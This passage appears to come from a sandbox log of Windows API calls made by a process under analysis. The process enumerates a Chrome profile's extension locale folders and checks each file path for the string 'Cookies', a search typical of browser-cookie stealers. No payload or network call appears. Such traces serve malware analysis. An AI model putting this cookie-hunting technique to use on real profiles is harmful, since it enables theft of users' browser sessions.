ftLastAccessTime.dwLowDateTime=0x85a42c90, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a42c90, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.307] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.307] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.307] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned 137 [0163.307] lstrlenW (lpString="\\") returned 1 [0163.307] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko" [0163.307] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\" [0163.307] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\") returned 138 [0163.307] lstrlenW (lpString="messages.json") returned 13 [0163.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\" [0163.308] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json" [0163.308] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ko\\messages.json", lpSrch="Cookies") returned 0x0 [0163.308] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a42c90, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.308] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.308] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="lt", cAlternateFileName="")) returned 1 [0163.308] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0163.308] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0163.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.308] lstrlenW (lpString="\\") returned 1 [0163.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.308] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.308] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.308] lstrlenW (lpString="lt") returned 2 [0163.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.308] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0163.308] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0163.308] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*" [0163.308] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.309] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.309] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.309] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.309] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.309] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.309] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned 137 [0163.309] lstrlenW (lpString="\\") returned 1 [0163.309] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt" [0163.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\" [0163.309] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\") returned 138 [0163.309] lstrlenW (lpString="messages.json") returned 13 [0163.309] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\" [0163.309] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json" [0163.357] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lt\\messages.json", lpSrch="Cookies") returned 0x0 [0163.357] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0163.357] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0163.357] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="lv", cAlternateFileName="")) returned 1 [0163.357] lstrcmpiW (lpString1="lv", lpString2=".") returned 1 [0163.357] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0163.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0163.357] lstrlenW (lpString="\\") returned 1 [0163.357] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0163.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0163.357] lstrlenW (lpString="lv") returned 2 [0163.357] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0163.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0163.357] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0163.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*" [0163.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0163.358] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0163.358] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a68df0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a68df0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0163.358] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0163.358] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0163.358] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a68df0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a6a560, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0163.358] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned 137 [0163.358] lstrlenW (lpString="\\") returned 1 [0163.358] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv" [0163.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\" [0163.358] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\") returned 138 [0163.358] lstrlenW (lpString="messages.json") returned 13 [0163.358] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\" [0163.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json" [0163.358] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\lv\\messages.json", lpSrch="Cookies") returned 0x0 [0163.358] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: 